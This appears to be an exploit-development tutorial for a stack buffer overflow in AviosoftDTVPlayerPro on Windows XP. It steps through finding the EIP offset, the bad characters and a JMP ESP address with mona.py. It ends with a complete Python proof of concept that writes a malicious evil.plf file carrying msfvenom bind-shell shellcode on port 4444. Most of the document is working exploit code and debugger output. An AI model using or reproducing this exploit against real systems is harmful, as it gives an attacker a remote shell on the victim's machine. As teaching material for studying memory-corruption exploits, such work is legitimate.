Prequisites
- Windows XP SP3 (en-us)
- Immunity Debugger
- AviosoftDTVPlayerPro
Triggering the overflow
After some fuzzing the basic exploit can be create with the following python code.
1#!/usr/bin/python -w
2
3buffer = "A" * 2000
4
5f = open("evil.plf","w")
6f.write(buffer)
7f.close()
Opening this file with the vulnerable application results in an access violation with the following register values.

Great, the EIP is under our control.
Identifying EIP Offset
In order to identify the correct offset of the overflow let’s create a pattern and start again.
!mona pc 2000
Mona.py creates a unique pattern that has to be opened by the application. At the time of the access violation the following register values are presented.

Again, mona.py can help us to identify the correct offset of the overflow.
!mona findmsp
This command does all the magic. The output is depicted in the following screenshot.

We can also check the offset manually.
!mona pattern_offset 37694136
- Pattern 6Ai7 (0x37694136) found in cyclic pattern at position 260
Now we know, that we can overwrite the EIP after 260 bytes. After updating the initial script, we can now exactly overwrite EIP.

Controlling EIP
Luckily, ESP points to the bytes after the BBBB. So let’s identify a location that stores a suiteable JMP ESP.
!mona jmp -r esp
Mona.py can list all suitable JMP instructions.

Let’s choose one after identifying the bad characters.
Identifying Bad Characters
Next, we need to verify the valid charset for the exploit. Let’s create a byte pattern and compare it against loaded data.
!mona bytearray -b '\x00'
The bad characters \x0A was identified at 0x0012f489.

Iterating the previous steps until finally, all bad characters have been identified.
!mona compare -f c:\logs\DVDXPlayer\bytearray.bin
[+] Comparing with memory at location : 0x0012f480 (Stack)
!!! Hooray, normal shellcode unmodified !!!
Bytes omitted from input: 00 0a 1a
Adding Shellcode
Finally, let’s add a custom payload to the exploit code. With metasploit, we can just do that and update the python PoC.
msfvenom -p windows/console_bind_tcp LPORT=4444 -f python --platform win --arch x86 -b '\x00\x0a\x1a'
The Exploit
1#!/usr/bin/python -w
2
3import struct
4
5#-------------------------------------------------------------------------------------------------------#
6# msfvenom -p windows/console_bind_tcp LPORT=4444 -f python --platform win --arch x86 -b '\x00\x0a\x1a' #
7#-------------------------------------------------------------------------------------------------------#
8shellcode = ("\xbf\x11\xa0\x1c\x7c\xd9\xe9\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
9"\x56\x83\xea\xfc\x31\x7a\x0f\x03\x7a\x1e\x42\xe9\x80\xc8\x0b"
10"\x12\x79\x08\x6c\x9a\x9c\x39\xbe\xf8\xd5\x6b\x0e\x8a\xb8\x87"
11"\xe5\xde\x28\x1c\x8b\xf6\x5f\x95\x26\x21\x51\x26\x87\xed\x3d"
12"\xe4\x89\x91\x3f\x38\x6a\xab\x8f\x4d\x6b\xec\xf2\xbd\x39\xa5"
13"\x79\x6f\xae\xc2\x3c\xb3\xcf\x04\x4b\x8b\xb7\x21\x8c\x7f\x02"
14"\x2b\xdd\x2f\x19\x63\xc5\x44\x45\x54\xf4\x89\x95\xa8\xbf\xa6"
15"\x6e\x5a\x3e\x6e\xbf\xa3\x70\x4e\x6c\x9a\xbc\x43\x6c\xda\x7b"
16"\xbb\x1b\x10\x78\x46\x1c\xe3\x02\x9c\xa9\xf6\xa5\x57\x09\xd3"
17"\x54\xb4\xcc\x90\x5b\x71\x9a\xff\x7f\x84\x4f\x74\x7b\x0d\x6e"
18"\x5b\x0d\x55\x55\x7f\x55\x0e\xf4\x26\x33\xe1\x09\x38\x9b\x5e"
19"\xac\x32\x0e\x8b\xd6\x18\x47\x78\xe5\xa2\x97\x16\x7e\xd0\xa5"
20"\xb9\xd4\x7e\x86\x32\xf3\x79\xe9\x69\x43\x15\x14\x91\xb4\x3f"
21"\xd3\xc5\xe4\x57\xf2\x65\x6f\xa8\xfb\xb0\x20\xf8\x53\x6a\x81"
22"\xa8\x13\xda\x69\xa3\x9b\x05\x89\xcc\x71\x30\x8d\x02\xa1\x11"
23"\x7a\x67\x55\x84\x26\xee\xb3\xcc\xc6\xa6\x6c\x78\x25\x9d\xa4"
24"\x1f\x56\xf7\x98\x88\xc0\x4f\xf7\x0e\xee\x4f\xdd\x3d\x43\xe7"
25"\xb6\xb5\x8f\x3c\xa6\xca\x85\x14\xa1\xf3\x4e\xee\xdf\xb6\xef"
26"\xef\xf5\x20\x93\x62\x92\xb0\xda\x9e\x0d\xe7\x8b\x51\x44\x6d"
27"\x26\xcb\xfe\x93\xbb\x8d\x39\x17\x60\x6e\xc7\x96\xe5\xca\xe3"
28"\x88\x33\xd2\xaf\xfc\xeb\x85\x79\xaa\x4d\x7c\xc8\x04\x04\xd3"
29"\x82\xc0\xd1\x1f\x15\x96\xdd\x75\xe3\x76\x6f\x20\xb2\x89\x40"
30"\xa4\x32\xf2\xbc\x54\xbc\x29\x05\x64\xf7\x73\x2c\xed\x5e\xe6"
31"\x6c\x70\x61\xdd\xb3\x8d\xe2\xd7\x4b\x6a\xfa\x92\x4e\x36\xbc"
32"\x4f\x23\x27\x29\x6f\x90\x48\x78")
33
34buffer = "A" * 260
35buffer += struct.pack('< L', 0x6405c20b) #jmp esp [MediaPlayerCtrl.dll]
36buffer += "\x90" * 32
37buffer += shellcode
38
39f = open("evil.plf","w")
40f.write(buffer)
41f.close()
By loading the plf file, the payload is executed.